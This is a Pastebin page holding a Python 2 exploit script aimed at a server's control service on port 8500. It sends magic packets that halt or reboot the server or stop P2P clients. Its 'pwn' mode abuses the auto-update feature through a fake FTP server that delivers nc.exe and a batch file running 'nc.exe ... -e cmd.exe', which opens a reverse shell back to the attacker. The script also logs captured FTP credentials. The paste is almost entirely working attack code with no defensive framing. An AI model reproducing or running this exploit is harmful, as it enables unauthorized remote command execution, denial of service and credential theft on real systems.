API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Aug 19th, 2017
79
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 5.74 KB | None | 0 0
raw download clone embed print report
  1. #-----#
  2. #$> cat Too_Many_Greemlins_exposed_to_the_sunlight.py
  3. #-----#
  4.  
  5. #!/usr/bin/env python2
  6. # -*- coding: utf-8 -*-
  7.  
  8. import sys
  9. import struct
  10. import time
  11. import socket
  12. from threading import Thread
  13.  
  14. #
  15. # Change this IP to your public IP address.
  16. #
  17. PUBLIC_IP = "192.168.0.1"
  18.  
  19. #
  20. # Don't forget to open ports 21 and 8501 in your
  21. # OpenOffice.org firewall
  22. #
  23. SRV_PORT   = 8500
  24. FTP_PORT   = 21
  25. SHELL_PORT = 8501
  26.  
  27. MAGIC  = "\x15\x66\x00\x78"
  28. HALT   = "\x65"
  29. REBOOT = "\x66"
  30. STOP   = "\x70\x00\x00"
  31. UPDATE = "\x82"
  32. OK     = "\x01"
  33.  
  34. def usage (msg = None):
  35.  
  36.   if msg: print "Error: %s\n" % msg
  37.  
  38.   print "Usage: %s IP command" % sys.argv[0]
  39.   print
  40.   print "commands:"
  41.   print "- halt    shutdown the server"
  42.   print "- reboot  reboot the server"
  43.   print "- stop    stop P2P clients (eMule and Shareaza)"
  44.   print "- pwn     use a vulnerability in the Auto Update feature to
  45. get a remote shell"
  46.  
  47.   sys.exit(0)
  48.  
  49. class fake_ftpd(Thread):
  50.  
  51.     def __init__ (self):
  52.       Thread.__init__(self)
  53.       self.s = None
  54.       f  = open('./nc.exe', 'rb')
  55.       nc = f.read()
  56.       f.close()
  57.       batch  = "@echo off\r\n"
  58.       batch += "move cmd_execute_update_cmd_file.txt nc.exe\r\n"
  59.       batch += "nc.exe %s %s -e cmd.exe\r\n" % (PUBLIC_IP, SHELL_PORT)
  60.       self.files = {
  61.         'script/script_diff2/execute_update.bat': batch,
  62.         'script/script_diff2/cmd_execute_update_cmd_file.txt': nc
  63.       }
  64.  
  65.     def run (self):
  66.       self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  67.       self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  68.       self.s.bind(("", FTP_PORT))
  69.       self.s.listen(1)
  70.       self.s.listen(0x1337)
  71.       print "[+] Waiting for FTP connection..."
  72.  
  73.       conn, addr = self.s.accept()
  74.  
  75.       print "[!] FTP - %s connected!" % addr[0]
  76.       conn.send("220 Welcome to my FTPd - Ready to pwn you!\r\n")
  77.  
  78.       while True:
  79.         data = conn.recv(1024)
  80.         if not data:
  81.           break
  82.  
  83.         args = data.rstrip().split(' ')
  84.  
  85.         if data.startswith('CWD'):
  86.           conn.send('250 CWD command successful.\r\n')
  87.  
  88.         elif data.startswith('TYPE'):
  89.           conn.send('200 TYPE set.\r\n')
  90.  
  91.         elif data.startswith('USER'):
  92.           conn.send('331 Password required.\r\n')
  93.           username = data.split(' ')[1].rstrip()
  94.  
  95.         elif data.startswith('PASS'):
  96.           conn.send('230 User logged in.\r\n')
  97.           password = data.split(' ')[1].rstrip()
  98.           print "[!] TMG credentials: %s/%s" % (username, password)
  99.  
  100.         elif data.startswith('PORT'):
  101.           arg  = args[1].split(',')
  102.           ip   = '.'.join(arg[:4])
  103.           port = int(arg[4]) * 256 + int(arg[5])
  104.           sdata = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  105.           sdata.connect((ip, port))
  106.           conn.send('200 PORT command successful.\r\n')
  107.  
  108.         elif data.startswith('RETR'):
  109.           conn.send('150 Opening BINARY mode data connection\r\n')
  110.           buf = self.files.get(args[1], 'file not found\r\n')
  111.           sdata.send(buf)
  112.           sdata.close()
  113.           conn.send('226 Transfer complete\r\n')
  114.           print "[+] File \"%s\" transfered..." % args[1]
  115.  
  116.         elif data.startswith('NLST'):
  117.           conn.send('150 Here comes the directory listing.\r\n')
  118.           if len(args) == 1:
  119.             listing = ''
  120.           else:
  121.             listing = args[1]
  122.           sdata.send(listing + '\r\n')
  123.           sdata.close()
  124.           conn.send('226 Directory send OK.\r\n')
  125.  
  126.         elif data.startswith('QUIT'):
  127.           conn.send('221 Goodbye.\r\n')
  128.           break
  129.  
  130.         else:
  131.           conn.send('500 Unknown command.\r\n')
  132.  
  133.       conn.close()
  134.  
  135.  
  136. def do_stuff (host, cmd):
  137.  
  138.   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  139.   s.settimeout(5)
  140.  
  141.   try:
  142.     print "[+] Connecting to %s:%d..." % (host, SRV_PORT)
  143.     s.connect((host, SRV_PORT))
  144.  
  145.   except Exception, e:
  146.     print("[?] Error: %s" % e)
  147.     s.close()
  148.     return ;
  149.  
  150.   print "[+] Sending evil packet..."
  151.  
  152.   if cmd == 'halt':
  153.     s.send(MAGIC + HALT)
  154.     print "[!] Done!"
  155.  
  156.   elif cmd == 'reboot':
  157.     s.send(MAGIC + REBOOT)
  158.     print "[!] Done!"
  159.  
  160.   elif cmd == 'stop':
  161.     s.send(MAGIC + STOP)
  162.     data = s.recv(1)
  163.  
  164.     if data and data[0] == OK:
  165.       print "[!] Done!"
  166.     else:
  167.       print "[!] Error :("
  168.  
  169.   elif cmd == 'pwn':
  170.     ftpd = fake_ftpd()
  171.     ftpd.daemon = True
  172.     ftpd.start()
  173.  
  174.     command = socket.inet_aton(PUBLIC_IP) + struct.pack("h",
  175. socket.ntohs(FTP_PORT)) + "\x00\x00"
  176.     s.send(MAGIC + UPDATE + command)
  177.     data = s.recv(1)
  178.  
  179.     if data and data[0] == OK:
  180.       s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  181.       s2.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  182.       s2.bind(("", SHELL_PORT))
  183.       s2.listen(1)
  184.  
  185.       conn, addr = s2.accept()
  186.       print "[!] SHELL - %s connected!" % addr[0]
  187.       print conn.recv(4096)
  188.  
  189.       while True:
  190.         cmd = raw_input()
  191.         if cmd == "quit" or cmd == "exit":
  192.             break;
  193.         conn.send(cmd + "\r\n")
  194.  
  195.         data = ""
  196.         conn.settimeout(None)
  197.         data = conn.recv(1024)
  198.         conn.settimeout(1)
  199.  
  200.         while True:
  201.             line = ""
  202.             try:
  203.                 line = conn.recv(1024)
  204.             except socket.timeout:
  205.                 break
  206.             if line == "":
  207.                 break
  208.             data += line
  209.  
  210.         tab = data.split("\n")
  211.         print "\n".join(tab[1:-1])
  212.  
  213.       conn.close()
  214.     else:
  215.       print "[!] Error :("
  216.  
  217.   s.close()
  218.  
  219. if __name__ == '__main__':
  220.  
  221.   if len(sys.argv) < 3:
  222.     usage("Not enough arguments")
  223.  
  224.   (_, host, cmd) = sys.argv
  225.  
  226.   if cmd not in ['halt', 'reboot', 'stop', 'pwn']:
  227.     usage('Invalid command ("%s")' % cmd)
  228.  
  229.   do_stuff(host, cmd)
  230.  
  231.   sys.exit(0)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!